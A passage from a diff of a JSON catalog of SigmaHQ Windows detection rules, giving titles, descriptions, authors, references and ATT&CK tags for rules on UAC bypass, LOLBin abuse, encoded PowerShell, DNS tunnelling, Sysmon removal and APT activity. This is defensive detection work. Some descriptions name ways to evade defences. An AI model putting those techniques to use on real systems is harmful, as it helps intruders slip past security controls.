backups", + "meta": { + "author": "Max Altgelt, Tobias Michalski", + "creation_date": "2021/08/09", + "falsepositive": [ + "Some rare backup scenarios" + ], + "filename": "proc_creation_win_malware_conti_shadowcopy.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", + "https://twitter.com/vxunderground/status/1423336151860002816?s=20", + "https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_conti_shadowcopy.yml" + ], + "tags": [ + "attack.impact", + "attack.t1490" + ] + }, + "uuid": "f57f8d16-1f39-4dcb-a604-6c73d9b54b3d", + "value": "Sensitive Registry Access via Volume Shadow Copy" + }, + { + "description": "Detects suspicious parent process for cmd.exe", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/21", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_unusual_parent_for_cmd.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/unusual-parent-process-for-cmd.exe.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_unusual_parent_for_cmd.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "4b991083-3d0e-44ce-8fc4-b254025d8d4b", + "value": "Unusual Parent Process for cmd.exe" + }, + { + "description": "Detects base64 encoded powershell 'Invoke-' call", + "meta": { + "author": "pH-T", + "creation_date": "2022/05/20", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_susp_base64_invoke.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_base64_invoke.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" + ] + }, + "uuid": "6385697e-9f1b-40bd-8817-f4a91f40508e", + "value": "Suspicious Base64 Encoded Powershell Invoke" + }, + { + "description": "This is an unusual method to download files. It starts a browser headless and downloads a file from a location. This can be used by threat actors to download files.", + "meta": { + "author": "Sreeman, Florian Roth", + "creation_date": "2022/01/04", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_headless_browser_file_download.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/mrd0x/status/1478234484881436672?s=12", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_headless_browser_file_download.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "0e8cfe08-02c9-4815-a2f8-0d157b7ed33e", + "value": "File Download with Headless Browser" + }, + { + "description": "Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_uac_bypass_pkgmgr_dism.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_pkgmgr_dism.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "a743ceba-c771-4d75-97eb-8a90f7f4844c", + "value": "UAC Bypass Using PkgMgr and DISM" + }, + { + "description": "Detect usage of the \"runexehelper.exe\" binary as a proxy to launch other programs", + "meta": { + "author": "frack113", + "creation_date": "2022/12/29", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_runexehelper.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Runexehelper/", + "https://twitter.com/0gtweet/status/1206692239839289344", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_runexehelper.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "cd71385d-fd9b-4691-9b98-2b1f7e508714", + "value": "Lolbin Runexehelper Use As Proxy" + }, + { + "description": "Detects SharpLdapWhoami, a whoami alternative by asking the LDAP service on a domain controller", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/08/29", + "falsepositive": [ + "Programs that use the same command line flags" + ], + "filename": "proc_creation_win_hack_sharpldapwhoami.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/bugch3ck/SharpLdapWhoami", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_sharpldapwhoami.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033", + "car.2016-03-001" + ] + }, + "uuid": "d9367cbb-c2e0-47ce-bdc0-128cb6da898d", + "value": "SharpLdapWhoami" + }, + { + "description": "Detects Winword process loading custmom dlls via the '/l' switch.\nWinword can be abused as a LOLBIN to download arbitrary file or load arbitrary DLLs.\n", + "meta": { + "author": "Nasreddine Bencherchali, Victor Sergeev, oscd.community", + "creation_date": "2022/05/17", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_winword.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/D4Vinci/One-Lin3r/blob/9fdfa5f0b9c698dfbd4cdfe7d2473192777ae1c6/one_lin3r/core/liners/windows/cmd/dll_loader_word.py", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_winword.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ] + }, + "uuid": "4ae3e30b-b03f-43aa-87e3-b622f4048eed", + "value": "Winword LOLBIN Usage" }, { "description": "Detects Trojan loader activity as used by APT28", @@ -34490,501 +30991,78 @@ "value": "Sofacy Trojan Loader Activity" }, { - "description": "Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM", + "description": "Detects the uninstallation of Sysinternals Sysmon, which could be the result of legitimate administration or a manipulation for defense evasion", "meta": { - "author": "MSTIC, FPT.EagleEye", - "creation_date": "2021/06/15", + "author": "frack113", + "creation_date": "2022/01/12", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_apt_sourgrum.yml", + "filename": "proc_creation_win_uninstall_sysmon.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.virustotal.com/gui/file/c299063e3eae8ddc15839767e83b9808fd43418dc5a1af7e4f44b97ba53fbd3d/detection", - "https://github.com/Azure/Azure-Sentinel/blob/43e9be273dca321295190bfc4902858e009d4a35/Detections/MultipleDataSources/SOURGUM_IOC.yaml", - "https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_sourgrum.yml" - ], - "tags": [ - "attack.t1546", - "attack.t1546.015", - "attack.persistence", - "attack.privilege_escalation" - ] - }, - "uuid": "7ba08e95-1e0b-40cd-9db5-b980555e42fd", - "value": "SOURGUM Actor Behaviours" - }, - { - "description": "Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/10/22", - "falsepositive": [ - "Renamed SysInternals tool" - ], - "filename": "proc_creation_win_apt_ta17_293a_ps.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.us-cert.gov/ncas/alerts/TA17-293A", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_ta17_293a_ps.yml" + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md#atomic-test-11---uninstall-sysmon", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uninstall_sysmon.yml" ], "tags": [ "attack.defense_evasion", - "attack.g0035", - "attack.t1036.003", - "car.2013-05-009" + "attack.t1562.001" ] }, - "uuid": "18da1007-3f26-470f-875d-f77faf1cab31", - "value": "Ps.exe Renamed SysInternals Tool" + "uuid": "6a5f68d1-c4b5-46b9-94ee-5324892ea939", + "value": "Uninstall Sysinternals Sysmon" }, { - "description": "Detects mshta loaded by wmiprvse as parent as used by TA505 malicious documents", + "description": "Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images", "meta": { - "author": "Florian Roth", - "creation_date": "2020/12/08", + "author": "frack113", + "creation_date": "2022/01/16", "falsepositive": [ - "Unknown" + "Legitimate script" ], - "filename": "proc_creation_win_apt_ta505_dropper.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/ForensicITGuy/status/1334734244120309760", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_ta505_dropper.yml" - ], - "tags": [ - "attack.execution", - "attack.g0092", - "attack.t1106" - ] - }, - "uuid": "18cf6cf0-39b0-4c22-9593-e244bdc9a2d4", - "value": "TA505 Dropper Load Pattern" - }, - { - "description": "Detects specific process characteristics of Chinese TAIDOOR RAT malware load", - "meta": { - "author": "Florian Roth", - "creation_date": "2020/07/30", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_apt_taidoor.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-216a", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_taidoor.yml" - ], - "tags": [ - "attack.execution", - "attack.t1055.001" - ] - }, - "uuid": "d1aa3382-abab-446f-96ea-4de52908210b", - "value": "TAIDOOR RAT DLL Load" - }, - { - "description": "Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia", - "meta": { - "author": "@41thexplorer, Microsoft Defender ATP", - "creation_date": "2019/11/12", - "falsepositive": "No established falsepositives", - "filename": "proc_creation_win_apt_tropictrooper.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://cloudblogs.microsoft.com/microsoftsecure/2018/11/28/windows-defender-atp-device-risk-score-exposes-new-cyberattack-drives-conditional-access-to-protect-networks/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_tropictrooper.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "8c7090c3-e0a0-4944-bd08-08c3a0cecf79", - "value": "TropicTrooper Campaign November 2018" - }, - { - "description": "Detects automated lateral movement by Turla group", - "meta": { - "author": "Markus Neis", - "creation_date": "2017/11/07", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_apt_turla_commands_critical.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://securelist.com/the-epic-turla-operation/65545/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_turla_commands_critical.yml" - ], - "tags": [ - "attack.g0010", - "attack.execution", - "attack.t1059", - "attack.lateral_movement", - "attack.t1021.002", - "attack.discovery", - "attack.t1083", - "attack.t1135" - ] - }, - "uuid": "c601f20d-570a-4cde-a7d6-e17f99cb8e7f", - "value": "Turla Group Lateral Movement" - }, - { - "description": "Detects automated lateral movement by Turla group", - "meta": { - "author": "Markus Neis", - "creation_date": "2017/11/07", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_apt_turla_commands_medium.yml", + "filename": "proc_creation_win_dsim_remove.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://securelist.com/the-epic-turla-operation/65545/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_turla_commands_medium.yml" + "https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md#atomic-test-26---disable-windows-defender-with-dism", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsim_remove.yml" ], "tags": [ - "attack.g0010", - "attack.execution", - "attack.t1059", - "attack.lateral_movement", - "attack.t1021.002", - "attack.discovery", - "attack.t1083", - "attack.t1135" + "attack.defense_evasion", + "attack.t1562.001" ] }, - "uuid": "75925535-ca97-4e0a-a850-00b5c00779dc", - "value": "Automated Turla Group Lateral Movement" + "uuid": "43e32da2-fdd0-4156-90de-50dfd62636f9", + "value": "Dism Remove Online Package" }, { - "description": "Detects commands used by Turla group as reported by ESET in May 2020", + "description": "Detecting DNS tunnel activity for Muddywater actor", "meta": { - "author": "Florian Roth", - "creation_date": "2020/05/26", + "author": "@caliskanfurkan_", + "creation_date": "2020/06/04", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_apt_turla_comrat_may20.yml", + "filename": "proc_creation_win_apt_muddywater_dnstunnel.yml", "level": "critical", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_turla_comrat_may20.yml" + "https://www.vmray.com/analyses/5ad401c3a568/report/overview.html", + "https://www.virustotal.com/gui/file/5ad401c3a568bd87dd13f8a9ddc4e450ece61cd9ce4d1b23f68ce0b1f3c190b7/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_muddywater_dnstunnel.yml" ], "tags": [ - "attack.g0010", - "attack.execution", - "attack.t1059.001", - "attack.t1053.005", - "attack.t1027" + "attack.command_and_control", + "attack.t1071.004" ] }, - "uuid": "9e2e51c5-c699-4794-ba5a-29f5da40ac0c", - "value": "Turla Group Commands May 2020" - }, - { - "description": "Detects a specific process creation patterns as seen used by UNC2452 and provided by Microsoft as Microsoft Defender ATP queries", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/01/22", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_apt_unc2452_cmds.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_unc2452_cmds.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "9be34ad0-b6a7-4fbd-91cf-fc7ec1047f5f", - "value": "UNC2452 Process Creation Patterns" - }, - { - "description": "Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/01/20", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_apt_unc2452_ps.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware", - "https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md#atomic-test-7---create-a-process-using-wmi-query-and-an-encoded-command", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_unc2452_ps.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.t1047" - ] - }, - "uuid": "b7155193-8a81-4d8f-805d-88de864ca50c", - "value": "UNC2452 PowerShell Pattern" - }, - { - "description": "A sigma rule detecting an unidetefied attacker who used phishing emails to target high profile orgs on November 2018. The Actor shares some TTPs with YYTRIUM/APT29 campaign in 2016.", - "meta": { - "author": "@41thexplorer, Microsoft Defender ATP", - "creation_date": "2018/11/20", - "falsepositive": "No established falsepositives", - "filename": "proc_creation_win_apt_unidentified_nov_18.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/DrunkBinary/status/1063075530180886529", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_unidentified_nov_18.yml" - ], - "tags": [ - "attack.execution", - "attack.t1218.011" - ] - }, - "uuid": "7453575c-a747-40b9-839b-125a0aae324b", - "value": "Unidentified Attacker November 2018" - }, - { - "description": "Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities", - "meta": { - "author": "Florian Roth, Markus Neis", - "creation_date": "2020/02/01", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_apt_winnti_mal_hk_jan20.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_winnti_mal_hk_jan20.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.g0044" - ] - }, - "uuid": "3121461b-5aa0-4a41-b910-66d25524edbb", - "value": "Winnti Malware HK University Campaign" - }, - { - "description": "Detects specific process characteristics of Winnti Pipemon malware reported by ESET", - "meta": { - "author": "Florian Roth, oscd.community", - "creation_date": "2020/07/30", - "falsepositive": [ - "Legitimate setups that use similar flags" - ], - "filename": "proc_creation_win_apt_winnti_pipemon.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_winnti_pipemon.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.g0044" - ] - }, - "uuid": "73d70463-75c9-4258-92c6-17500fe972f2", - "value": "Winnti Pipemon Characteristics" - }, - { - "description": "Detects activity mentioned in Operation Wocao report", - "meta": { - "author": "Florian Roth, frack113", - "creation_date": "2019/12/20", - "falsepositive": [ - "Administrators that use checkadmin.exe tool to enumerate local administrators" - ], - "filename": "proc_creation_win_apt_wocao.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/", - "https://twitter.com/SBousseaden/status/1207671369963646976", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_wocao.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1012", - "attack.defense_evasion", - "attack.t1036.004", - "attack.t1027", - "attack.execution", - "attack.t1053.005", - "attack.t1059.001" - ] - }, - "uuid": "1cfac73c-be78-4f9a-9b08-5bde0c3953ab", - "value": "Operation Wocao Activity" - }, - { - "description": "Detects a ZxShell start by the called and well-known function name", - "meta": { - "author": "Florian Roth, oscd.community, Jonhnathan Ribeiro", - "creation_date": "2017/07/20", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_apt_zxshell.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.hybrid-analysis.com/sample/5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16?environmentId=100", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_zxshell.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.003", - "attack.defense_evasion", - "attack.t1218.011", - "attack.s0412", - "attack.g0001" - ] - }, - "uuid": "f0b70adb-0075-43b0-9745-e82a1c608fcc", - "value": "ZxShell Malware" - }, - { - "description": "The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create \"shortcuts\" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.", - "meta": { - "author": "Sreeman", - "creation_date": "2020/03/13", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_arbitrary_shell_execution_via_settingcontent.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_arbitrary_shell_execution_via_settingcontent.yml" - ], - "tags": [ - "attack.t1204", - "attack.t1566.001", - "attack.execution", - "attack.initial_access" - ] - }, - "uuid": "24de4f3b-804c-4165-b442-5a06a2302c7e", - "value": "Arbitrary Shell Command Execution Via Settingcontent-Ms" - }, - { - "description": "Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web)", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/06/07", - "falsepositive": [ - "Legitimate cases in which archives contain ISO or IMG files and the user opens the archive and the image via clicking and not extraction" - ], - "filename": "proc_creation_win_archiver_iso_phishing.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/1ZRR4H/status/1534259727059787783", - "https://app.any.run/tasks/e1fe6a62-bce8-4323-a49a-63795d9afd5d/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_archiver_iso_phishing.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1566" - ] - }, - "uuid": "fcdf69e5-a3d3-452a-9724-26f2308bf2b1", - "value": "Phishing Pattern ISO in Archive" - }, - { - "description": "Application Virtualization Utility is included with Microsoft Office. We are able to abuse \"AppVLP\" to execute shell commands.\nNormally, this binary is used for Application Virtualization, but we can use it as an abuse binary to circumvent the ASR file path rule folder\nor to mark a file as a system file.\n", - "meta": { - "author": "Sreeman", - "creation_date": "2020/03/13", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_asr_bypass_via_appvlp_re.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_asr_bypass_via_appvlp_re.yml" - ], - "tags": [ - "attack.t1218", - "attack.defense_evasion", - "attack.execution" - ] - }, - "uuid": "9c7e131a-0f2c-4ae0-9d43-b04f4e266d43", - "value": "Using AppVLP To Circumvent ASR File Path Rule" - }, - { - "description": "Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084", - "meta": { - "author": "Bhabesh Raj", - "creation_date": "2021/09/08", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_atlassian_confluence_cve_2021_26084_exploit.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://nvd.nist.gov/vuln/detail/CVE-2021-26084", - "https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html", - "https://github.com/h3v0x/CVE-2021-26084_Confluence", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_atlassian_confluence_cve_2021_26084_exploit.yml" - ], - "tags": [ - "attack.initial_access", - "attack.execution", - "attack.t1190", - "attack.t1059" - ] - }, - "uuid": "245f92e3-c4da-45f1-9070-bc552e06db11", - "value": "Atlassian Confluence CVE-2021-26084" + "uuid": "36222790-0d43-4fe8-86e4-674b27809543", + "value": "DNS Tunnel Technique from MuddyWater" }, { "description": "Detects usage of attrib.exe to hide files from users.", @@ -35011,1982 +31089,29 @@ "value": "Hiding Files with Attrib.exe" }, { - "description": "Marks a file as a system file using the attrib.exe utility", - "meta": { - "author": "frack113", - "creation_date": "2022/02/04", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_attrib_system.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md#atomic-test-3---create-windows-system-file-with-attrib", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/attrib", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_attrib_system.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.001" - ] - }, - "uuid": "bb19e94c-59ae-4c15-8c12-c563d23fe52b", - "value": "Set Windows System File with Attrib" - }, - { - "description": "Detects usage of attrib with \"+s\" option to set suspicious script or executable as system files to hide them from users and make them unable to delete with simple rights. The rule limit the search to specific extensions and directories to avoid FP's", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/06/28", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_attrib_system_susp_paths.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://app.any.run/tasks/c28cabc8-a19f-40f3-a78b-cae506a5c0d4", - "https://app.any.run/tasks/cfc8870b-ccd7-4210-88cf-a8087476a6d0", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_attrib_system_susp_paths.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.001" - ] - }, - "uuid": "efec536f-72e8-4656-8960-5e85d091345b", - "value": "Set Suspicious Files as System Files Using Attrib" - }, - { - "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", - "meta": { - "author": "frack113", - "creation_date": "2021/07/28", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_automated_collection.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_automated_collection.yml" - ], - "tags": [ - "attack.collection", - "attack.t1119", - "attack.credential_access", - "attack.t1552.001" - ] - }, - "uuid": "f576a613-2392-4067-9d1a-9345fb58d8d1", - "value": "Automated Collection Command Prompt" - }, - { - "description": "Detects attackers using tooling with bad opsec defaults e.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run, one trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.", - "meta": { - "author": "Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard", - "creation_date": "2020/10/23", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_bad_opsec_sacrificial_processes.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/", - "https://www.cobaltstrike.com/help-opsec", - "https://twitter.com/CyberRaiju/status/1251492025678983169", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regsvr32", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32", - "https://docs.microsoft.com/en-us/dotnet/framework/tools/regasm-exe-assembly-registration-tool", - "https://docs.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool#feedback", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bad_opsec_sacrificial_processes.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.011" - ] - }, - "uuid": "a7c3d773-caef-227e-a7e7-c2f13c622329", - "value": "Bad Opsec Defaults Sacrificial Processes With Improper Arguments" - }, - { - "description": "Detects base64 encoded powershell cmdlet invocation of known suspicious cmdlets", - "meta": { - "author": "pH-T", - "creation_date": "2022/05/31", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_base64_invoke_susp_cmdlets.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_base64_invoke_susp_cmdlets.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" - ] - }, - "uuid": "fd6e2919-3936-40c9-99db-0aa922c356f7", - "value": "Malicious Base64 Encoded Powershell Invoke Cmdlets" - }, - { - "description": "Detects base64 encoded listing Win32_Shadowcopy", - "meta": { - "author": "Christian Burkard", - "creation_date": "2022/03/01", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_base64_listing_shadowcopy.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_base64_listing_shadowcopy.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" - ] - }, - "uuid": 